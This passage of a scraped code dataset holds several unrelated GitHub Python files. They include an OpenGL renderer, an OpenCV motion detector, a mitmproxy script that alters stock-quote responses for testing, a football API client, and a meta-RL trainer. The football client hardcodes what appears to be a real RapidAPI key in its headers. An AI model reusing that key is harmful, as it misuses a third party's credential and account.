mat_world2cam[:3, 3]\n mat_cam2world = np.eye(4)\n mat_cam2world[:3, :3], mat_cam2world[:3, 3] = R, t\n\n mats_model = [(mat_cam2world @ mat_model @ mat_off).T for mat_model, mat_off in zip(mats_model, mats_off)]\n\n # prepare view and projection matrices (row major)\n mat_view = self._compute_view(mat_cam2world) # gl view matrix from camera matrix\n mat_proj = self._compute_proj(intrinsics) # projection matrix\n mat_view_proj = mat_view @ mat_proj # view-projection matrix\n\n # STAGE 1) compute \\hat{d}_T and \\hat{n}_T: render model under estimated pose\n self.fbo_stage_1.activate()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n if not cull_back:\n gl.glDisable(gl.GL_CULL_FACE) # fixes rendering of single-sided lamp mesh in LINEMOD\n self.program['u_mode'] = 0\n\n for i, (model_id, m) in enumerate(zip(model_ids, mats_model)):\n self.program['u_mv'] = m @ mat_view\n self.program['u_mvp'] = m @ mat_view_proj\n\n try:\n model = self.models[model_id]\n model.draw(self.program)\n except ValueError as _:\n print(\"failed to draw\")\n return 0\n if not cull_back:\n gl.glEnable(gl.GL_CULL_FACE) # enable again for rendering other stuff\n\n # STAGE 2)\n # - compute sub-scores f_d(T) and f_n(T) per-pixel\n self.fbo_stage_2.activate()\n self.program['u_texture'] = self.normal_depth_buf\n self.program['u_mode'] = 1\n self.program['u_mv'] = np.eye(4)\n self.program['u_mvp'] = np.eye(4)\n self.models[-1].draw(self.program)\n\n if return_map:\n buffer = np.zeros((self.height, self.width, 4), dtype=np.float32)\n gl.glReadPixels(0, 0, self.width, self.height, gl.GL_RGBA, gl.GL_FLOAT, buffer)\n buffer.shape = self.height, self.width, 4\n\n # - compute verification score \\bar{f}(T): speed-up summation by reading from mipmap layer\n gl.glActiveTexture(gl.GL_TEXTURE0)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.cost_buf.handle)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)\n layer = 4\n buf = np.zeros((int(self.height / (2 ** layer)), int(self.width / (2 ** layer)), 4), dtype=np.float32)\n per_pixel_fit = gl.glGetTexImage(gl.GL_TEXTURE_2D, layer, gl.GL_RGBA, gl.GL_FLOAT, buf)\n gl.glBindTexture(gl.GL_TEXTURE_2D, 0)\n\n n_valid = per_pixel_fit[:, :, 0].sum()\n if n_valid == 0: # no valid pixel -> minimal fit\n score = 0\n else:\n mean_f_d = per_pixel_fit[:, :, 1].sum() / n_valid\n mean_f_n = per_pixel_fit[:, :, 2].sum() / n_valid if use_normals else 0\n score = (mean_f_d + mean_f_n) * 0.5\n\n if return_map and use_normals:\n return score, buffer[..., 1], buffer[..., 2] # score, f_d, f_n\n elif return_map and not use_normals:\n return score, buffer[..., 1], np.zeros_like(buffer[..., 1]) # score, f_d, zeros\n else:\n return score\n\n def _compute_view(self, cam):\n R, t = cam[:3, :3], cam[:3, 3]\n\n # camera coord axes\n z = R @ [0, 0, 1]\n z = -z / np.linalg.norm(z)\n y = R @ [0, -1, 0]\n y = y / np.linalg.norm(y)\n x = np.cross(y, z)\n x = x / np.linalg.norm(x)\n\n # invert to get view matrix\n view = np.eye(4)\n view[:3, :3] = np.vstack((x, y, z)).T\n view[3, :3] = -view[:3, :3].T @ t\n\n return view\n\n def _compute_proj(self, intrinsics):\n width, height = self.width, self.height\n near, far = self.near, self.far\n fx = intrinsics[0, 0]\n fy = intrinsics[1, 1]\n cx = intrinsics[0, 2]\n cy = intrinsics[1, 2]\n s = intrinsics[0, 1]\n q = -(far + near) / (far - near)\n qn = -2 * far * near / (far - near)\n mat_proj = np.array([[2 * fx / width, -2 * s / width, (-2 * cx + width) / width, 0],\n [0, 2 * fy / height, (2 * cy - height) / height, 0],\n [0, 0, q, qn],\n [0, 0, -1, 0]]).T\n return 
mat_proj\n","repo_name":"dornik/sporeagent","sub_path":"environment/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":12245,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"73046178863","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 20 19:00:03 2019\r\n\r\n@author: ADITYA\r\n\"\"\"\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\nvideo = cv.VideoCapture(0)\r\nframe2 = None\r\ncv.waitKey(5)\r\nx2 = y2 = None\r\nwhile True:\r\n    ret, frame = video.read()\r\n    if frame2 is None:  # reference frame initialisation (keep the glove-wearing hand out of frame)\r\n        frame2 = frame\r\n    d = cv.absdiff(frame, frame2)\r\n    gray = cv.cvtColor(d, cv.COLOR_BGR2GRAY)\r\n    hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\r\n    lr = np.array([110, 50, 50])\r\n    ur = np.array([130, 255, 255])\r\n    mask = cv.inRange(hsv, lr, ur)  # color detection (blue)\r\n    blur = cv.GaussianBlur(gray, (5, 5), 0)\r\n    ret, th = cv.threshold(blur, 20, 255, cv.THRESH_BINARY)\r\n    frame3 = cv.bitwise_and(th, mask, mask=mask)  # intersection of color detection and frame-difference (motion) detection\r\n    dilated = cv.dilate(frame3, np.ones((3, 3), np.uint8), iterations=1)\r\n\r\n    c, _ = cv.findContours(dilated, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\r\n    for contour in c:\r\n        if cv.contourArea(contour) < 5000:  # area threshold\r\n            continue\r\n        x, y, w, h = cv.boundingRect(contour)\r\n        x1 = x + w/2  # centroid of the hand\r\n        y1 = y + h/2\r\n        cv.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 3)\r\n        if x2 is None or y2 is None:\r\n            x2 = x1  # store the first centroid to compare with the next frame\r\n            y2 = y1\r\n            continue\r\n        if x2-x1 > 20:\r\n            print(\"Right\")\r\n        if x1-x2 > 20:\r\n            print(\"Left\")\r\n        if y2-y1 > 20:\r\n            print(\"Forward\")\r\n        if y1-y2 > 20:\r\n            print(\"Reverse\")\r\n        #print(x1,y1)\r\n        x2 = x1\r\n        y2 = y1\r\n        break\r\n\r\n    #cv.drawContours(frame, c, -1, (0,255,0),2)\r\n    cv.imshow('frame', frame)\r\n    cv.imshow('frame3', dilated)\r\n    if cv.waitKey(1) == 27:\r\n        break\r\nvideo.release()\r\ncv.destroyAllWindows()\r\n","repo_name":"adityarnair/Opencv-object-detection","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38150090785","text":"class naive_bayes:\n def __init__(self, data, feature_type):\n self.class_prior = None\n self.feature_prob = None\n self.feature_type = feature_type\n self.target = list(self.feature_type)[-1]\n\n def train(self, x_train, y_train):\n \"\"\"updates the model parameters from the training data\n x_train: A pandas data frame, feature predictors\n y_train: A pandas Series, class labels of the training data\"\"\"\n\n # Finding the prior class probabilities\n\n if self.feature_type[self.target] is \"continuous\":\n print(\"Naive Bayes is a classification model. Cannot work with continuous data\")\n else:\n self.class_prior = y_train.value_counts(normalize=True)\n # print(self.class_prior)\n\n self.feature_type.pop(\"y\")\n\n for feature in self.feature_type:\n print(feature)","repo_name":"argowtham/Machine-Learning","sub_path":"bias_variance_analysis/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70846120624","text":"class Solution(object):\n def search(self, nums, target):\n \"\"\"\n :param nums:List[int]\n :param target:int\n :return:int\n \"\"\"\n if target not in nums:\n return -1\n return nums.index(target)\n\n\nnums = [4,5,6,7,0,1,2]\ntarget = 0\nprint(Solution().search(nums, target))","repo_name":"laintime01/pythonLearning","sub_path":"algorithm/leetcode33_searchInRotatedArray.py","file_name":"leetcode33_searchInRotatedArray.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"73068165103","text":"from FileLoader import FTPLoader\nimport parse_json as jp\nimport os\nimport time\nfrom logging import Log\nfrom multiprocessing import cpu_count, Queue, Process\n\ndef time_counter(func):\n def count(*args):\n start = time.time()\n func(*args)\n end = time.time()\n print(end - start)\n return count\n\n#delete '#' if you wont to count the time of work method\n#@time_counter\ndef start_processes(parse_res, count_cpu_param=1):\n user = [parse_res.user[\"host\"],\n parse_res.user[\"name\"],\n parse_res.user[\"password\"]]\n processes = []\n log = Log(os.path.dirname(os.path.abspath(__file__)))\n queue_of_paths = Queue()\n\n if not FTPLoader.check_login(*user, log):\n return\n\n for path in parse_res.paths:\n queue_of_paths.put(path)\n\n if queue_of_paths.qsize() < count_cpu_param:\n loader = FTPLoader(*user, log)\n loader.start_load(queue_of_paths)\n else:\n for i in range(count_cpu_param - 1):\n another_loader = FTPLoader(*user, log)\n\n # you can change Process to Thread and it will be work(don't forget import threading)\n process = Process(target=another_loader.start_load, args=(queue_of_paths, ))\n process.start()\n processes.append(process)\n\n loader = FTPLoader(*user, log)\n loader.start_load(queue_of_paths)\n\n\nif __name__ == \"__main__\":\n parsing_res = jp.ParseJson(\"conf.json\")\n if parsing_res.parsing_complete:\n count_cpu = cpu_count()\n start_processes(parsing_res, count_cpu)\n\n","repo_name":"fsatka/Python-Projects","sub_path":"FileLoader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38831072434","text":"\"\"\"Unit tests for scalarstop.model_template.\"\"\"\nimport doctest\nimport unittest\n\nimport tensorflow as tf\n\nimport scalarstop as sp\n\n\ndef load_tests(loader, tests, ignore): # pylint: disable=unused-argument\n \"\"\"Have the unittest loader also run doctests.\"\"\"\n tests.addTests(doctest.DocTestSuite(sp.model_template))\n return tests\n\n\nclass MyModelTemplate(sp.ModelTemplate):\n \"\"\"Our example model template for testing.\"\"\"\n\n @sp.dataclass\n class Hyperparams(sp.HyperparamsType):\n \"\"\"HYperparams for MyModelTemplate.\"\"\"\n\n a: int\n b: str = \"hi\"\n\n def set_model(self):\n \"\"\"Setting a new model.\"\"\"\n model = tf.keras.Sequential(\n layers=[tf.keras.layers.Dense(units=self.hyperparams.a)]\n )\n model.compile()\n return model\n\n\nclass MyModelTemplateForgotHyperparams(sp.ModelTemplate):\n \"\"\"See what happens when we don't define hyperparams.\"\"\"\n\n Hyperparams = None # type: ignore\n\n\nclass TestModelTemplate(unittest.TestCase):\n \"\"\"Tests for :py:class:`scalarstop.ModelTemplate`.\"\"\"\n\n def test_name(self):\n \"\"\"Test that names work.\"\"\"\n model_template_1 = MyModelTemplate(\n hyperparams=dict(a=1),\n )\n model_template_2 = MyModelTemplate(hyperparams=dict(a=1, b=\"hi\"))\n for i, model_template in enumerate((model_template_1, model_template_2)):\n with self.subTest(f\"model_template_{i}\"):\n self.assertEqual(\n model_template.name, \"MyModelTemplate-naro6iqyw9whazvkgp4w3qa2\"\n )\n self.assertEqual(model_template.group_name, \"MyModelTemplate\")\n self.assertEqual(\n sp.dataclasses.asdict(model_template.hyperparams), dict(a=1, b=\"hi\")\n )\n\n def test_missing_hyperparams_class(self):\n \"\"\"Test what happens when the hyperparams class itself is missing.\"\"\"\n with self.assertRaises(sp.exceptions.YouForgotTheHyperparams):\n MyModelTemplateForgotHyperparams()\n","repo_name":"scalarstop/scalarstop","sub_path":"tests/test_model_template.py","file_name":"test_model_template.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"9503627199","text":"\n\nfrom PyQt4.QtCore import pyqtSignal, Qt\nfrom PyQt4.QtGui import QTableView, QApplication, QWidget, QVBoxLayout\nfrom PyQt4.QtGui import QLineEdit, QSpinBox, QDoubleSpinBox, QCheckBox\n\nclass PersonDataForm(QWidget):\n\n def __init__(self, parent=None):\n super(PersonDataForm, self).__init__(parent)\n\n self._setupUi()\n\n\n def _setupUi(self):\n\n self.setLayout(QVBoxLayout())\n\n self.forenameInput = QLineEdit(self)\n self.forenameInput.setObjectName('forenameInput')\n self.layout().addWidget(self.forenameInput)\n\n self.surnameInput = QLineEdit(self)\n self.surnameInput.setObjectName('surnameInput')\n self.layout().addWidget(self.surnameInput)\n\n self.ageInput = QSpinBox(self)\n self.ageInput.setObjectName('ageInput')\n self.ageInput.setRange(0, 200)\n self.layout().addWidget(self.ageInput)\n\n self.weightInput = QDoubleSpinBox(self)\n self.weightInput.setObjectName('weightInput')\n self.weightInput.setRange(0.0, 1000.0)\n self.layout().addWidget(self.weightInput)\n\n self.incomeInput = QDoubleSpinBox(self)\n self.incomeInput.setObjectName('incomeInput')\n self.incomeInput.setRange(0.0, 1000.0)\n self.layout().addWidget(self.incomeInput)\n\n self.marriedInput = QCheckBox(self)\n self.marriedInput.setObjectName('marriedInput')\n self.layout().addWidget(self.marriedInput)","repo_name":"mtils/ems","sub_path":"examples/qt4/gui/persondata_form.py","file_name":"persondata_form.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"8988796169","text":"\"\"\"\n这里是尝试对数据进行一个批量的处理或者说数据清理\n还是相同的理念:\n1- 需要知道对应处理接口的数据返回形式\n2- 需要知道想进行什么样子的处理\n万变不离其宗,所有dict或者list复杂数据类型,or 是数字或者字符串或者布尔型的数据,后者都是递归后处理的核心部分\n\"\"\"\nimport json\nfrom mitmproxy import http\n\nrules = [0, 1, 3, 5, 100]\nurl_index = dict()\n\n\n# @pytest.mark.parametrize(\"rules\", [0, 1, 3, 5, 100])\ndef response(flow: http.HTTPFlow):\n url = flow.request.url.split(\".json\")[0]\n # 针对对url的访问次数来实现不同的参数处理\n if url not in url_index.keys():\n url_index[url] = 0\n else:\n url_index[url] += 1\n seed = int(url_index[url] % len(rules))\n index = rules[seed]\n\n # 需要处理的接口中存在一个x=**\n if \"quote.json\" in flow.request.url and \"x=\" in flow.request.url:\n # 先接收到返回的数据\n data = json.loads(flow.response.content)\n # 对数据进行批量修改\n new_data = json_travel(data, array=2, text=index, num=index)\n print()\n # 打印\n data_mess = json.dumps(new_data, indent=2, ensure_ascii=False)\n print(\"=====================修改后的信息=======================================\")\n print(data_mess)\n\n # 返回修改的数据\n flow.response.text = json.dumps(new_data)\n\n\ndef json_travel(data, array=None, text=1, num=1):\n \"\"\"\n 完成json数据的倍数操作\n :param data: 要修改的内容\n :param array: 列表的修改规则,为None默认不修改\n :param text: 字符串的修改规则,为1默认不修改\n :param num: 整数或者浮点数的修改规则,为1默认不修改\n :return: data_new\n \"\"\"\n # 如果接口返回的参数是dict复杂数据类型,进行遍历:\n if isinstance(data, dict):\n data_new = dict()\n for k, v in data.items():\n # 对字典内部的数据再次进行一个递归,因为value还是一个复杂数据类型\n data_new[k] = json_travel(v, array, text, num)\n # 对应行情中每一只股票的名称,这里可以再进行处理,方便直接看出效果\n if k == \"name\":\n data_new[k] = json_travel(v, array, text=2, num=1)\n\n # 如果是列表,就对列表的每一项进行一个遍历,并进行数据处理\n elif isinstance(data, list):\n data_new = list()\n for item in data:\n item_new = json_travel(item, array, text, num)\n # 如果传入的array为空,则不进行处理\n if array is None:\n data_new.append(item_new)\n # 若array不为空,判断array修改规则\n else:\n if isinstance(array, int) and array >= 0:\n for i in range(array):\n data_new.append(item_new)\n else:\n data_new = data\n\n # 如果传入的是字符串,则和传入的text参数进行相乘,实现对字符串的修改\n elif isinstance(data, str):\n if isinstance(text, int) and text >= 0:\n data_new = data * text\n else:\n data_new = data\n\n # 如果是int或者float的数据,就对数字做一个乘积\n elif isinstance(data, int) or isinstance(data, float):\n data_new = data * num\n\n else:\n data_new = data\n\n return data_new\n","repo_name":"Dearin/Hogwarts","sub_path":"mitm_demo/test_mitm_handle.py","file_name":"test_mitm_handle.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"73484601584","text":"import http.client\nimport json\n\ndef getLigue1():\n conn = http.client.HTTPSConnection(\"api-football-v1.p.rapidapi.com\")\n headers = {\n 'X-RapidAPI-Key': \"08b693ac18msh71caadac3647d76p1d887fjsn29e7dc24331f\",\n 'X-RapidAPI-Host': \"api-football-v1.p.rapidapi.com\"\n }\n\n conn.request(\"GET\", \"/v3/leagues?id=61\", headers=headers)\n res = conn.getresponse()\n data = res.read()\n print(data.decode(\"utf-8\"))\n\n\ndef getLigue1Teams(id):\n conn = http.client.HTTPSConnection(\"api-football-v1.p.rapidapi.com\")\n headers = {\n 'X-RapidAPI-Key': \"08b693ac18msh71caadac3647d76p1d887fjsn29e7dc24331f\",\n 'X-RapidAPI-Host': \"api-football-v1.p.rapidapi.com\"\n }\n conn.request(\"GET\", f\"/v3/teams/statistics?league=61&season=2023&team={id}\", headers=headers)\n res = conn.getresponse()\n data = res.read().decode(\"utf-8\")\n response = json.loads(data)\n team = response.get(\"response\", {}).get(\"team\", [])\n goals = response.get(\"response\", {}).get(\"total\", [])\n return team\n\n\n\n\n","repo_name":"steeve-dev/ligue1data","sub_path":"ligue1data/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31833250024","text":"# Main file to run for Meta-RL\n\nimport gym\nimport csv\nimport numpy as np\nimport argparse\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport particles\nimport particles.scenarios as scenarios\nfrom particles.environment import PersonalAgentEnv\n\nfrom models.actor_critic import ActorCritic\nfrom models.reinforce import Reinforce\nfrom models.metalearner import MetaLearner\n\nparser = argparse.ArgumentParser(description=None)\n\nparser.add_argument('-s', '--scenario', default='meta_simple.py',\n help='Path of the scenario Python script')\nparser.add_argument(\n '--model', default='Reinforce')\nparser.add_argument('--num_agents', default=1, type=int)\nparser.add_argument('-p', '--personalization', default='cluster',\n help='Personalization setup: \"variance\", \"remap\", \"cluster\", \"none\" supported')\nparser.add_argument('--load_agents', default='')\nparser.add_argument(\n '--save_agents', default='agents-0.json')\nparser.add_argument('--lr', default=1e-2, type=int,\n help='Learning rate')\nparser.add_argument('--gamma', type=float, default=0.99, metavar='G',\n help='discount factor (default: 0.99)')\nparser.add_argument('--inner_updates', type=int, default=10,\n help='Number of rollouts per batch')\nparser.add_argument('-d', '--debug', action='store_true',\n help='Print for debugging')\nparser.add_argument('--specific_agents', default='', # Want to load the designated training agents here\n help='Only load specific agent(s)')\nparser.add_argument('--eval_agents', default='', # Want to load the designated evaluation agents here\n help='Load agent type(s) for evaluation')\nparser.add_argument('-e', '--episode_len', default=100,\n type=int, help='Number of timesteps per episode')\nparser.add_argument('-ne', '--num_episodes', default=500,\n type=int, help='How many episodes to run')\nparser.add_argument('-r', '--render', action='store_true',\n help='Render gridworld window')\nparser.add_argument('--seed', default=42, type=int,\n help='Randomization seed')\nparser.add_argument('--log_interval', default=1, type=int,\n help='Logging rate')\nparser.add_argument('--save_results', default='./results/results.csv')\nparser.add_argument('--save_model', default='./trained_models/model.pt')\nparser.add_argument('--k', default=10, type=int,\n help='Number of shots allowed')\nparser.add_argument('--batch_size', default=10, type=int,\n help='Batch size during regular updates')\nparser.add_argument('--num_iters', default=10, type=int,\n help='Number of meta-iterations')\nparser.add_argument('--num_eval_iters', default=100, type=int,\n help='Number of evaluation iterations')\nparser.add_argument('--optimizer', default='Adam')\nparser.add_argument('-ro', '--replace_optimizer', action='store_true',\n help='If true, replace optimizer when loading model')\nargs = parser.parse_args()\n\n# Need to specify support models and agent configuration\nassert args.specific_agents != ''\nassert args.eval_agents != ''\nassert args.load_agents != ''\n\nload_agents = './particles/configs/' + args.load_agents + '.json'\nsupport_agents = args.specific_agents.split(' ')\n\nif args.model == 'ActorCritic':\n model = ActorCritic\nelif args.model == 'Reinforce':\n model = Reinforce\nelse:\n raise NotImplementedError\n\n# Predefine the observation and action spaces\nmetalearner = MetaLearner(model, 2, 5, K=10, num_iters=50,\n initialize_size=len(support_agents), lr=args.lr)\nmetalearner.episode_len = args.episode_len\n\n# META-TRAINING #\n# Pick a random 
subset to train?\nnp.random.seed(args.seed)\nsupport_agents = np.random.choice(\n support_agents, 6) # pick 6 to train randomly\n\nfor agent in support_agents: # Train pre-trained models first\n scenario = scenarios.load(args.scenario).Scenario(\n kind=args.personalization, num_agents=args.num_agents, seed=args.seed,\n load_agents=load_agents, specific_agents=agent)\n\n scenario.sample_task = True\n\n world = scenario.make_world()\n world.episode_len = args.episode_len\n env = PersonalAgentEnv(world, scenario.reset_world, scenario.reward,\n scenario.observation, info_callback=None,\n done_callback=scenario.done, shared_viewer=True)\n env.discrete_action_input = True\n env.seed(args.seed)\n\n metalearner.env = env\n\n # Create new policy for updating\n metalearner.current_policy = metalearner.policy(\n 0, metalearner.obs_shape, metalearner.action_shape)\n\n optimizer = optim.Adam(metalearner.current_policy.parameters(), lr=args.lr)\n metalearner.optimizer = optimizer\n\n # For every training iteration, save trajectory and get updates\n for n in range(args.num_iters):\n metalearner.train(args.k, n + 1) # +1 because save after an update\n\n scenario.sample_task = True # Now change the entity type - doesn't actually matter\n\n# Model should have lists of trajectories and policies now, indexed by training iteration\n# total_iters = np.array(range(args.num_iters)) + 1\n# only get first and last updates?\nmetalearner.calculate_distances(iterations=[1, args.num_iters])\n# Initially have these. Should we calculate divergences between all pretrained models?\n# After doing that, can see which policies are close are far, and also sort of bin them together in an association list\n# Then after doing this, during evaluation, we want to calculate again given some new trajectory\n\n# EVALUATION\neval_agents = args.eval_agents.split(' ')\n\nmeta_info = [['Timestep', 'Episode', 'Episode_Reward', 'Eval_Agent']]\ninfo = [['Timestep', 'Episode', 'State_x_pos', 'State_y_pos',\n 'Action', 'Relative Reward', 'Episode_Reward', 'Eval_Agent']]\n\nfor agent in eval_agents:\n scenario = scenarios.load('simple.py').Scenario(\n kind=args.personalization, num_agents=args.num_agents, seed=args.seed,\n load_agents=load_agents, specific_agents=agent)\n # create world\n world = scenario.make_world()\n world.episode_len = args.episode_len\n\n env = PersonalAgentEnv(world, scenario.reset_world, scenario.reward,\n scenario.observation, info_callback=None,\n done_callback=scenario.done, shared_viewer=True)\n env.discrete_action_input = True\n env.seed(args.seed)\n\n if args.render:\n env.render()\n\n obs_n = env.reset()\n running_reward = -1.0\n\n total_timesteps = 0\n episode_ix = 0\n\n metalearner.env = env\n\n # num_episodes = int(args.num_episodes / args.k)\n\n for n in range(args.num_eval_iters): # 100? 
Number of updates\n if n == 0:\n policy = model(0, 2, 5) # Initiate new policy\n optimizer = optim.Adam(policy.parameters(), lr=args.lr)\n for update in range(10):\n metalearner.sample(policy)\n metalearner.adapt(policy, optimizer, 10)\n trajectory, ep_reward = metalearner.sample(\n policy) # Get new trajectory and ep_reward\n total_timesteps += 10 * args.episode_len\n\n meta_info.append([total_timesteps, episode_ix, ep_reward, agent])\n\n episode_ix += 1\n\n policies = metalearner.get_updated_policies(\n 4, policy, trajectory, 1)\n rewards = [policy['reward'] for policy in policies]\n # Just pick highest reward policy for now\n policy_ix = np.array(rewards).argsort()[0]\n policy = policies[policy_ix]['policy']\n if args.replace_optimizer:\n optimizer = optim.Adam(policy.parameters(), lr=args.lr)\n else:\n optimizer = policies[policy_ix]['optimizer']\n\n env.reset()\n else:\n # After this fast adaptation stage, revert to VPG\n for update in range(args.batch_size):\n t = 0\n while t < args.episode_len:\n ep_reward = 0\n act_n = []\n act_n.append(policy.action(obs_n[0]))\n # step environment\n obs_n, reward_n, done_n, _ = env.step(act_n)\n if args.debug:\n print('OBSERVATIONS: {}'.format(obs_n))\n # render all agent views\n if args.render:\n env.render()\n # display rewards\n if args.debug:\n for agent in env.world.agents:\n print(agent.name + \" reward: %0.3f\" %\n env._get_reward(agent))\n policy.rewards.append(reward_n[0])\n ep_reward += reward_n[0]\n t += 1\n total_timesteps += 1\n\n try:\n relative_reward = policy.rewards[-1] - \\\n policy.rewards[-2]\n except:\n relative_reward = 0\n\n if total_timesteps % args.log_interval == 0:\n info.append([total_timesteps, episode_ix, obs_n[0][0], obs_n[0][1],\n act_n[0], relative_reward, ep_reward, agent])\n if done_n[0] is True:\n continue\n policy.finish_episode(optimizer, args.gamma)\n episode_ix += 1\n if total_timesteps % args.log_interval == 0:\n print('Episode {}\\tLast reward: {:.3f}\\tAverage reward: {:.2f}'.format(\n episode_ix, ep_reward, running_reward))\n env.reset()\n # info.append([total_timesteps, n, obs_n[0][0], obs_n[0]\n # [1], act_n[0], relative_reward, ep_reward])\n # running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward\n policy.update(optimizer, args.batch_size)\n env.reset()\n\n # # Save model and results\n # print('Saving model...')\n # torch.save(policies[0].state_dict(), args.save_model)\n\nwith open(args.save_results, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(info)\n\nmeta_results_fname = '{}-meta.csv'.format(args.save_results.split('.csv')[0])\n\nwith open(meta_results_fname, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(meta_info)\n\n\n# python meta_main.py --num_iters 10 --k 10 --seed 1 --load_agents 'agents-clustered-p' --num_eval_iters 10 --model 'Reinforce' --log_interval 1 --episode_len 100 --optimizer 'Adam' --specific_agents 'PersonalAgent-0 PersonalAgent-1 PersonalAgent-3 PersonalAgent-8 PersonalAgent-9 PersonalAgent-10 PersonalAgent-13 PersonalAgent-15 PersonalAgent-16 PersonalAgent-18 PersonalAgent-21 PersonalAgent-22' --eval_agents 'PersonalAgent-2 PersonalAgent-4 PersonalAgent-5 PersonalAgent-6 PersonalAgent-7 PersonalAgent-11 PersonalAgent-12 PersonalAgent-14 PersonalAgent-17 PersonalAgent-19 PersonalAgent-20 PersonalAgent-23'\n\n\n\n","repo_name":"mzio/personalized-particle-env","sub_path":"meta_main.py","file_name":"meta_main.py","file_ext":"py","file_size_in_byte":11165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"3060619811","text":"import csv\r\n\r\nwith open(\"movies.csv\",encoding=\"utf8\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n allmovies = data[1:]\r\n headers = data[0]\r\n\r\nheaders.append(\"poster_link\")\r\nwith open(\"final.csv\",\"a+\") as f:\r\n writer = csv.writer(f)\r\n writer.writerow(headers)\r\n\r\nwith open(\"movie_links.csv\",encoding=\"utf8\") as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n allmovielinks = data[1:]\r\n\r\nfor i in allmovies:\r\n posterfound = any(i[0] in j for j in allmovielinks)\r\n if posterfound:\r\n for movielinkitem in allmovielinks:\r\n if i[0] == movielinkitem[0]:\r\n i.append(movielinkitem[1])\r\n if len(i) == 20:\r\n with open(\"final.csv\",\"a+\",encoding=\"utf8\") as f:\r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(i) \r\n","repo_name":"Rishiidc/movierec","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40776816684","text":"import sys\nimport graphviz_managed.logging\ngraphviz_managed.logging.setup()\n\n# ---8<--- START SAMPLE ---8<---\n\nfrom graphviz_managed import Graph\ngraph = Graph(label='Highlight graph entry points', rankdir='LR')\nnode = graph.node\n\n# Define a larger graph\na = node(label='a')\nb = node(label='b')\nc = node(label='c')\nd = node(label='d')\ne = node(label='e')\nf = node(label='f')\na >> [b, e]\nc >> [b, e]\nd >> a\ne >> f\nf >> [b, a]\n\n# Highlight nodes with no incoming edges\nfrom collections import defaultdict\nincoming_count = defaultdict(int)\nfor edge in graph.edges:\n incoming_count[edge.end] += 1\nfor node in graph.nodes:\n if incoming_count[node] == 0:\n node.attrs.color = 'darkgreen'\n node.attrs.fontcolor = 'darkgreen'\n node.attrs.style = 'filled'\n node.attrs.fillcolor = 'beige'\n\n# ---8<--- END SAMPLE ---8<---\n\n# Save output\ngraph.render(sys.argv[1])\n","repo_name":"sio/graphviz-managed","sub_path":"samples/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"42153534395","text":"import mindspore.nn as nn\nfrom mindspore.common.initializer import TruncatedNormal\n\n\nclass Conv2dLayer(nn.Cell):\n \"\"\"\n Define the convolutional layer in the discriminator, including convolution, activation operations.\n\n Args:\n in_channels(int): spatial dimension of input tensor.\n out_channels(int): spatial dimension of output tensor.\n kernel_size(int): the height and width of convolution kernel.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, stride, dilation):\n super(Conv2dLayer, self).__init__()\n self.activation = nn.LeakyReLU(0.2)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride, pad_mode='same', dilation=dilation,\n has_bias=True, weight_init=TruncatedNormal(0.05))\n\n def construct(self, x):\n x = self.conv2d(x)\n x = self.activation(x)\n return x\n\n\nclass DepthSeparableConv(nn.Cell):\n \"\"\"\n Building gate branch of depth-separable LWGC.\n\n Args:\n in_channel(int): spatial dimension of input tensor.\n out_channel(int): spatial dimension of output tensor.\n stride(int): the moving step of convolution kernel.\n dilation(int): dilation size of convolution kernel.\n\n Return:\n x: Output of the network layer.\n \"\"\"\n\n def __init__(self, in_channel, out_channel, stride, dilation):\n super(DepthSeparableConv, self).__init__()\n self.ds_conv = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, 